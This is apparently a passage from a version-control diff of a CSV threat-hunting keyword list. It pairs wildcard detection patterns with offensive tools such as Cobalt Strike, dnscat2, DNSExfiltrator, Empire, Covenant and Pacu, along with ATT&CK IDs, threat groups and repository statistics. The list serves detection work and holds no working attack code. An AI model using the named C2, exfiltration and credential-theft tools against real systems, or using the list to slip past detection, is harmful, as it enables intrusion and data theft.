APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_prepend'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*'dns_stager_subhost'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*dnsadmin_serverlevelplugindll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*dnsadmin_serverlevelplugindll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*DNSAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*dns-beacon *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*DNS-C2 #>*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" -"*dnscan-master*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*dnscan-master*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*dnscat -*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*dnscat tcpcat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*dnscat*","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","N/A","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","N/A","N/A","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" @@ -9445,7 +9593,7 @@ "*dnscat2-win32.exe*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" "*dnschef --fakeip 127.0.0.1 -q*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*dnsenum*","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/fwaeytens/dnsenum","1","1","N/A","N/A","6","521","133","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z" -"*DNS-Enum-*-*.log*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*DNS-Enum-*-*.log*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*dnsexfiltrator.*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" "*DNSExfiltratorLib*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" "*DNSListener.py*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" @@ -9467,25 +9615,25 @@ "*do_attack(*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*do_bypassuac*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*do_pyinject*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*Do-AltShiftEsc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Do-AltShiftTab*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*doc/extras/HACKING.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*docker * covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*docker * --name elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*docker * -t elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*docker build -t rmg .*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" -"*docker run */pacu:latest*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*docker run */usr/src/rde1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*docker run */usr/src/rec2*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Do-AltShiftEsc*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Do-AltShiftTab*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*doc/extras/HACKING.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*docker * covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker * --name elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker * -t elite *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*docker build -t rmg .*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - 